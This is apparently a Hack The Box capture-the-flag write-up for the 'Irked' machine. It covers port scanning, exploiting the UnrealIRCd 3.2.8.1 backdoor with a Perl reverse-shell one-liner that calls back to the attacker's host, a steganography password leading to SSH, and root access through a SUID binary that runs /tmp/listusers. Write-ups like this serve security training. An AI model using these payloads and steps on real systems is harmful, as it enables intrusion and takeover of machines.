Irked
Contents
Ports scan
u505@kali:~/HTB/Machines/Irked$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.117 --rate=1000 [sudo] password for u505:
Starting masscan 1.0.5 at 2020-02-14 19:56:36 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 33523/tcp on 10.10.10.117 Discovered open port 111/tcp on 10.10.10.117 Discovered open port 6697/tcp on 10.10.10.117 Discovered open port 65534/tcp on 10.10.10.117 Discovered open port 80/tcp on 10.10.10.117 Discovered open port 22/tcp on 10.10.10.117 Discovered open port 8067/tcp on 10.10.10.117
u505@kali:~/HTB/Machines/Irked$ nmap -sC -sV 10.10.10.117 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-14 14:56 EST Nmap scan report for irked.htb (10.10.10.117) Host is up (0.039s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) | ssh-hostkey: | 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA) | 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA) | 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA) |_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519) 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-server-header: Apache/2.4.10 (Debian) |_http-title: Site doesn't have a title (text/html). 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 33523/tcp status | 100024 1 33735/udp status | 100024 1 35313/tcp6 status |_ 100024 1 41089/udp6 status Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.77 seconds
We run a new nmap with all ports found by masscan
u505@kali:~/HTB/Machines/Irked$ nmap -sC -sV -p 22,80,111,6697,8067,50675,65534 10.10.10.117 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-14 14:59 EST Nmap scan report for irked.htb (10.10.10.117) Host is up (0.039s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) | ssh-hostkey: | 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA) | 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA) | 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA) |_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519) 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-server-header: Apache/2.4.10 (Debian) |_http-title: Site doesn't have a title (text/html). 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 33523/tcp status | 100024 1 33735/udp status | 100024 1 35313/tcp6 status |_ 100024 1 41089/udp6 status 6697/tcp open irc UnrealIRCd 8067/tcp open irc UnrealIRCd 50675/tcp closed unknown 65534/tcp open irc UnrealIRCd Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 68.06 seconds
Web enumeration
The page has a smiley.
u505@kali:~/HTB/Machines/Irked$ curl http://irked <img src=irked.jpg> <br> <b><center>IRC is almost working!</b></center> u505@kali:~/HTB/Machines/Irked$ wget -q http://irked/irked.jpg
The web crawling doesn't give us any hint.
u505@kali:~/HTB/Machines/Irked$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt" -f -t 50 -u http://10.10.10.117 --plain-text-report=dirsearch.txt
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt | HTTP method: get | Threads: 50 | Wordlist size: 9221
Error Log: /opt/utils/dirsearch/logs/errors-20-02-14_15-07-55.log
Target: http://10.10.10.117
[15:07:55] Starting: [15:07:56] 403 - 300B - /.htpasswd.txt [15:08:07] 403 - 293B - /icons/ [15:08:10] 200 - 626B - /manual/ [15:08:17] 403 - 301B - /server-status/
Task Completed
Port 6697
In the port 6697, there is an IRC server.
u505@kali:~/HTB/Machines/Irked$ irssi /connect 10.10.10.117 6697 Irssi v1.2.2-1+b1 - https://irssi.org 15:12 -!- ___ _ 15:12 -!- |_ _|_ _ _____(_) 15:12 -!- | || '_(_-<_-< | 15:12 -!- |___|_| /__/__/_| 15:12 -!- Irssi v1.2.2-1+b1 - https://irssi.org 15:13 -!- Irssi: Looking up 10.10.10.117 15:13 -!- Irssi: Connecting to 10.10.10.117 [10.10.10.117] port 6697 15:13 -!- Irssi: Connection to 10.10.10.117 established 15:13 !irked.htb *** Looking up your hostname... 15:13 !irked.htb *** Couldn't resolve your hostname; using your IP address instead 15:13 -!- You have not registered 15:13 -!- Welcome to the ROXnet IRC Network u505!u505@10.10.14.26 15:13 -!- Your host is irked.htb, running version Unreal3.2.8.1 15:13 -!- This server was created Mon May 14 2018 at 13:12:50 EDT 15:13 -!- irked.htb Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj 15:13 -!- UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 are supported by this server 15:13 -!- WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ are supported by this server 15:13 -!- EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP are supported by this server 15:13 -!- There are 1 users and 0 invisible on 1 servers 15:13 -!- 1 unknown connection(s) 15:13 -!- I have 1 clients and 0 servers 15:13 -!- Current Local Users: 1 Max: 1 15:13 -!- Current Global Users: 1 Max: 1 15:13 -!- MOTD File is missing 15:13 -!- Mode change [+iwx] for user u505 /quit
The version is Unreal 3.2.8.1
u505@kali:~/HTB/Machines/Irked$ searchsploit Unreal 3.2.8.1
-------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------- ----------------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | exploits/linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow | exploits/windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute | exploits/linux/remote/13853.pl
-------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
Taking a look at metasploit script, we see that the backdoor allows to execute code after the characters AB;
Exploit IRC backdoor
Raise listener
u505@kali:~/HTB/Machines/Irked$ rlwrap nc -nlvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
Call the backdoor
u505@kali:~/HTB/Machines/Irked$ telnet 10.10.10.117 6697
Trying 10.10.10.117...
Connected to 10.10.10.117.
Escape character is '^]'.
:irked.htb NOTICE AUTH :*** Looking up your hostname...
:irked.htb NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
AB; perl -e 'use Socket;$i="10.10.14.26";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
And the listener opens the reverse shell
u505@kali:~/HTB/Machines/Irked$ rlwrap nc -nlvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.117. Ncat: Connection from 10.10.10.117:36220. /bin/sh: 0: can't access tty; job control turned off $ whoami ircd $ python -c 'import pty; pty.spawn("/bin/bash")' ircd@irked:~/Unreal3.2$ stty raw -echo stty raw -echo
User flag
ircd@irked:~$ cat .bash_history
...
ls -lah
cd ..
ls
cd djmardov
ls
cd Documents
ls -lah
cat .backup
clear
exit
We will take a look to the folder Documents
ircd@irked:~$ cd /home/djmardov/Documents ircd@irked:/home/djmardov/Documents$ ls -la total 16 drwxr-xr-x 2 djmardov djmardov 4096 May 15 2018 . drwxr-xr-x 18 djmardov djmardov 4096 Nov 3 2018 .. -rw-r--r-- 1 djmardov djmardov 52 May 16 2018 .backup -rw------- 1 djmardov djmardov 33 May 15 2018 user.txt
We cannot catch the flag, but the hidden file .backup is readable.
ircd@irked:/home/djmardov/Documents$ cat .backup Super elite steg backup pw UPupDOWNdownLRlrBAbaSSss
Because of the word steg, I guess the password is some information hidden by steganography. I guess the image is the irked.jpg file on the web server.
u505@kali:~/HTB/Machines/Irked$ steghide info irked.jpg "irked.jpg": format: jpeg capacity: 1.5 KB Try to get information about embedded data ? (y/n) y Enter passphrase: embedded file "pass.txt": size: 17.0 Byte encrypted: rijndael-128, cbc compressed: yes u505@kali:~/HTB/Machines/Irked$ steghide extract -sf irked.jpg Enter passphrase: wrote extracted data to "pass.txt". u505@kali:~/HTB/Machines/Irked$ cat pass.txt Kab6h+m+bbp2J:HG
Now we can ssh the box
u505@kali:~/HTB/Machines/Irked$ ssh djmardov@irked The authenticity of host 'irked (10.10.10.117)' can't be established. ECDSA key fingerprint is SHA256:kunqU6QEf9TV3pbsZKznVcntLklRwiVobFZiJguYs4g. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'irked,10.10.10.117' (ECDSA) to the list of known hosts. djmardov@irked's password:
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Tue May 15 08:56:32 2018 from 10.33.3.3 djmardov@irked:~$ cat Documents/user.txt <USER_FLAG>
Enumeration
u505@kali:~/HTB/Machines/Irked/www$ cp /opt/utils/LinEnum/LinEnum.sh ./ u505@kali:~/HTB/Machines/Irked/www$ cp /opt/utils/pspy/pspy32 ./ 505@kali:~/HTB/Machines/Irked/www$ sudo python -m SimpleHTTPServer 80 [sudo] password for u505: Serving HTTP on 0.0.0.0 port 80 ...
From the target we download the files
djmardov@irked:~$ wget -q http://10.10.14.26/LinEnum.sh djmardov@irked:~$ wget -q http://10.10.14.26/pspy32 djmardov@irked:~$ chmod +x LinEnum.sh pspy32
During the enumeration a strange file appears with suid
[-] SUID files:
-rwsr-xr-- 1 root messagebus 362672 Nov 21 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9468 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 13816 Sep 8 2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 562536 Nov 19 2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 13564 Oct 14 2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
-rwsr-xr-x 1 root root 1085300 Feb 10 2018 /usr/sbin/exim4
-rwsr-xr-- 1 root dip 338948 Apr 14 2015 /usr/sbin/pppd
-rwsr-xr-x 1 root root 43576 May 17 2017 /usr/bin/chsh
-rwsr-sr-x 1 root mail 96192 Nov 18 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 78072 May 17 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 38740 May 17 2017 /usr/bin/newgrp
-rwsr-sr-x 1 daemon daemon 50644 Sep 30 2014 /usr/bin/at
-rwsr-xr-x 1 root root 18072 Sep 8 2016 /usr/bin/pkexec
-rwsr-sr-x 1 root root 9468 Apr 1 2014 /usr/bin/X
-rwsr-xr-x 1 root root 53112 May 17 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 52344 May 17 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser
-rwsr-xr-x 1 root root 96760 Aug 13 2014 /sbin/mount.nfs
-rwsr-xr-x 1 root root 38868 May 17 2017 /bin/su
-rwsr-xr-x 1 root root 34684 Mar 29 2015 /bin/mount
-rwsr-xr-x 1 root root 34208 Jan 21 2016 /bin/fusermount
-rwsr-xr-x 1 root root 161584 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 26344 Mar 29 2015 /bin/umount
viewuser file
The execution of the file give this result
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2020-02-14 15:44 (:0)
djmardov pts/0 2020-02-14 15:45 (10.10.14.26)
djmardov pts/1 2020-02-14 15:50 (10.10.14.26)
sh: 1: /tmp/listusers: not found
Pspy snoops the folowing
2020/02/14 15:55:08 CMD: UID=1000 PID=1961 | -bash 2020/02/14 15:55:08 CMD: UID=1000 PID=1962 | sh -c who 2020/02/14 15:55:08 CMD: UID=1000 PID=1963 | sh -c who 2020/02/14 15:55:08 CMD: UID=1000 PID=1964 | /usr/bin/viewuser 2020/02/14 15:55:08 CMD: UID=1000 PID=1965 | sh -c /tmp/listusers
I try to write something on the missing file
djmardov@irked:~$ echo "whoami" > /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2020-02-14 15:44 (:0)
djmardov pts/0 2020-02-14 15:45 (10.10.14.26)
djmardov pts/1 2020-02-14 15:50 (10.10.14.26)
sh: 1: /tmp/listusers: Permission denied
We fix the perms to the file
djmardov@irked:~$ chmod +x /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2020-02-14 15:44 (:0)
djmardov pts/0 2020-02-14 15:45 (10.10.14.26)
djmardov pts/1 2020-02-14 15:50 (10.10.14.26)
root
We are root! Instead of whoami, we will launch a new bash
djmardov@irked:~$ echo "bash" > /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2020-02-14 15:44 (:0)
djmardov pts/0 2020-02-14 15:45 (10.10.14.26)
djmardov pts/1 2020-02-14 15:50 (10.10.14.26)
root@irked:~# whoami
root
Instead of test and try, a more scientific and quieter method would be to transfer the file and decompile it.
Now, it was clear that the program does a setuid and execute the file /tmp/listusers
Root Flag
root@irked:~# cat /root/root.txt <ROOT_FLAG>
References
Daniel Simao 18:54, 14 February 2020 (EST)
